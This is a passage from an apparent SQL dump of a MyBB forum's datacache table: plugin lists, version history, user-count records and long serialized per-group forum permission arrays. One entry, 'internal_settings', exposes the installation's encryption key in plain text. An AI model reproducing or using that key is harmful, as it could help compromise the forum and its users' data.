11:\"onlinetoday\";s:11:\"onlinetoday\";s:12:\"lasteditlock\";s:12:\"lasteditlock\";s:10:\"google_seo\";s:10:\"google_seo\";s:16:\"courtesyedittime\";s:16:\"courtesyedittime\";s:15:\"my_proxy_killer\";s:15:\"my_proxy_killer\";s:14:\"editrepcomment\";s:14:\"editrepcomment\";s:11:\"achivements\";s:11:\"achivements\";s:13:\"hideUntilPost\";s:13:\"hideUntilPost\";s:13:\"forcepwchange\";s:13:\"forcepwchange\";}}'); INSERT INTO `mybb_datacache` (`title`, `cache`) VALUES ('internal_settings', 'a:1:{s:14:\"encryption_key\";s:32:\"ZBOUGPxw7cdV7WhItjSSRGxhgcwJeET4\";}'); INSERT INTO `mybb_datacache` (`title`, `cache`) VALUES ('version_history', 'a:24:{i:0;s:1:\"1\";i:1;s:1:\"2\";i:2;s:1:\"3\";i:3;s:1:\"4\";i:4;s:1:\"5\";i:5;s:1:\"6\";i:6;s:1:\"7\";i:7;s:1:\"8\";i:8;s:1:\"9\";i:9;s:2:\"10\";i:10;s:2:\"11\";i:11;s:2:\"12\";i:12;s:2:\"13\";i:13;s:2:\"14\";i:14;s:2:\"15\";i:15;s:2:\"16\";i:16;s:2:\"17\";i:17;s:2:\"18\";i:18;s:2:\"19\";i:19;s:2:\"20\";i:20;s:2:\"21\";i:21;s:2:\"22\";i:22;s:2:\"23\";i:23;s:2:\"24\";}'); INSERT INTO `mybb_datacache` (`title`, `cache`) VALUES ('mostonline', 'a:2:{s:8:\"numusers\";i:1084;s:4:\"time\";i:1352772875;}'); INSERT INTO `mybb_datacache` (`title`, `cache`) VALUES ('forumpermissions', 'a:48:{i:0;i:0;i:50;a:13:{i:1;a:18:{s:3:\"pid\";s:3:\"982\";s:3:\"fid\";s:2:\"50\";s:3:\"gid\";s:1:\"1\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:2;a:18:{s:3:\"pid\";s:3:\"983\";s:3:\"fid\";s:2:\"50\";s:3:\"gid\";s:1:\"2\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"1\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"1\";s:13:\"canpostreplys\";s:1:\"1\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:9;a:18:{s:3:\"pid\";s:3:\"987\";s:3:\"fid\";s:2:\"50\";s:3:\"gid\";s:1:\"9\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"1\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"1\";s:13:\"canpostreplys\";s:1:\"1\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:5;a:18:{s:3:\"pid\";s:3:\"984\";s:3:\"fid\";s:2:\"50\";s:3:\"gid\";s:1:\"5\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:6;a:18:{s:3:\"pid\";s:3:\"985\";s:3:\"fid\";s:2:\"50\";s:3:\"gid\";s:1:\"6\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"1\";s:13:\"canpostreplys\";s:1:\"1\";s:18:\"canpostattachments\";s:1:\"1\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"1\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"1\";s:12:\"canpostpolls\";s:1:\"1\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:8;a:18:{s:3:\"pid\";s:3:\"986\";s:3:\"fid\";s:2:\"50\";s:3:\"gid\";s:1:\"8\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:10;a:18:{s:3:\"pid\";s:3:\"988\";s:3:\"fid\";s:2:\"50\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"1\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:12;a:18:{s:3:\"pid\";s:3:\"989\";s:3:\"fid\";s:2:\"50\";s:3:\"gid\";s:2:\"12\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"1\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:13;a:18:{s:3:\"pid\";s:3:\"990\";s:3:\"fid\";s:2:\"50\";s:3:\"gid\";s:2:\"13\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"1\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:15;a:18:{s:3:\"pid\";s:3:\"991\";s:3:\"fid\";s:2:\"50\";s:3:\"gid\";s:2:\"15\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"1\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"1\";s:13:\"canpostreplys\";s:1:\"1\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:17;a:18:{s:3:\"pid\";s:3:\"992\";s:3:\"fid\";s:2:\"50\";s:3:\"gid\";s:2:\"17\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"1\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"1\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:20;a:18:{s:3:\"pid\";s:3:\"993\";s:3:\"fid\";s:2:\"50\";s:3:\"gid\";s:2:\"20\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"1\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:21;a:18:{s:3:\"pid\";s:3:\"994\";s:3:\"fid\";s:2:\"50\";s:3:\"gid\";s:2:\"21\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"1\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}}i:49;a:1:{i:10;a:18:{s:3:\"pid\";s:3:\"170\";s:3:\"fid\";s:2:\"49\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}}i:5;a:13:{i:1;a:18:{s:3:\"pid\";s:3:\"596\";s:3:\"fid\";s:1:\"5\";s:3:\"gid\";s:1:\"1\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:2;a:18:{s:3:\"pid\";s:3:\"597\";s:3:\"fid\";s:1:\"5\";s:3:\"gid\";s:1:\"2\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:9;a:18:{s:3:\"pid\";s:3:\"601\";s:3:\"fid\";s:1:\"5\";s:3:\"gid\";s:1:\"9\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:5;a:18:{s:3:\"pid\";s:3:\"598\";s:3:\"fid\";s:1:\"5\";s:3:\"gid\";s:1:\"5\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:6;a:18:{s:3:\"pid\";s:3:\"599\";s:3:\"fid\";s:1:\"5\";s:3:\"gid\";s:1:\"6\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:8;a:18:{s:3:\"pid\";s:3:\"600\";s:3:\"fid\";s:1:\"5\";s:3:\"gid\";s:1:\"8\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:10;a:18:{s:3:\"pid\";s:3:\"602\";s:3:\"fid\";s:1:\"5\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:12;a:18:{s:3:\"pid\";s:3:\"603\";s:3:\"fid\";s:1:\"5\";s:3:\"gid\";s:2:\"12\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:13;a:18:{s:3:\"pid\";s:3:\"604\";s:3:\"fid\";s:1:\"5\";s:3:\"gid\";s:2:\"13\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:15;a:18:{s:3:\"pid\";s:3:\"605\";s:3:\"fid\";s:1:\"5\";s:3:\"gid\";s:2:\"15\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:17;a:18:{s:3:\"pid\";s:3:\"606\";s:3:\"fid\";s:1:\"5\";s:3:\"gid\";s:2:\"17\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"1\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:20;a:18:{s:3:\"pid\";s:3:\"648\";s:3:\"fid\";s:1:\"5\";s:3:\"gid\";s:2:\"20\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:21;a:18:{s:3:\"pid\";s:3:\"764\";s:3:\"fid\";s:1:\"5\";s:3:\"gid\";s:2:\"21\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}}i:2;a:13:{i:1;a:18:{s:3:\"pid\";s:2:\"61\";s:3:\"fid\";s:1:\"2\";s:3:\"gid\";s:1:\"1\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:2;a:18:{s:3:\"pid\";s:2:\"62\";s:3:\"fid\";s:1:\"2\";s:3:\"gid\";s:1:\"2\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:9;a:18:{s:3:\"pid\";s:2:\"65\";s:3:\"fid\";s:1:\"2\";s:3:\"gid\";s:1:\"9\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:5;a:18:{s:3:\"pid\";s:2:\"63\";s:3:\"fid\";s:1:\"2\";s:3:\"gid\";s:1:\"5\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:6;a:18:{s:3:\"pid\";s:3:\"599\";s:3:\"fid\";s:1:\"2\";s:3:\"gid\";s:1:\"6\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:8;a:18:{s:3:\"pid\";s:2:\"64\";s:3:\"fid\";s:1:\"2\";s:3:\"gid\";s:1:\"8\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:10;a:18:{s:3:\"pid\";s:2:\"66\";s:3:\"fid\";s:1:\"2\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:12;a:18:{s:3:\"pid\";s:3:\"187\";s:3:\"fid\";s:1:\"2\";s:3:\"gid\";s:2:\"12\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeletep